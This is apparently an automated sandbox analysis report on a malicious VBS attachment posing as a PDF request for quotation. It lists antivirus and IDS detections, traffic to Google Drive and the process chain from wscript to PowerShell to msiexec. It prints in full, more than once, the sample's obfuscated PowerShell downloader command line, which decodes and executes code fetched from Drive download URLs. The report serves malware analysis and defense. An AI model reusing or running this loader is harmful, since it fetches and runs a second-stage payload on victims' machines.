thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-25T19:44:05.509680+020028032702Potentially Bad Traffic192.168.2.449739142.250.185.238443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: RFQ_24196MR_PDF.vbsReversingLabs: Detection: 31%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000001.00000002.1907996504.000001DED9F10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdbwq source: powershell.exe, 00000006.00000002.2123074697.000000000724C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: t.Automation.pdb% source: powershell.exe, 00000001.00000002.1944275574.000001DEF3F22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2090574709.0000000002A61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: hqm.Core.pdb source: powershell.exe, 00000006.00000002.2123074697.000000000724C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2090574709.0000000002A61000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49739 -> 142.250.185.238:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000006.00000002.2123074697.0000000007201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDDC56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBB21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2093208031.00000000045F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBB21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2093208031.00000000045F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDD63B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPR
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDD63B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC05D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/5f
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/=f
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4eP
              Source: powershell.exe, 00000006.00000002.2093208031.0000000004749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4eXR$l(
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2435070710.0000000020740000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com(
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC05D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download
              Source: msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download
              Source: msiexec.exe, 00000008.00000002.2423629116.00000000058CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=downloadOW
              Source: msiexec.exe, 00000008.00000002.2423629116.00000000058CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=downloadiW
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDCA70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49740 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7100.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_6288.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6288, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8AD6121_2_00007FFD9B8AD612
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8AC8661_2_00007FFD9B8AC866
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB2141A1_2_00007FFD9BB2141A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0739D4486_2_0739D448
              Source: RFQ_24196MR_PDF.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7288
              Source: unknownProcess created: Commandline size = 7288
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7288Jump to behavior
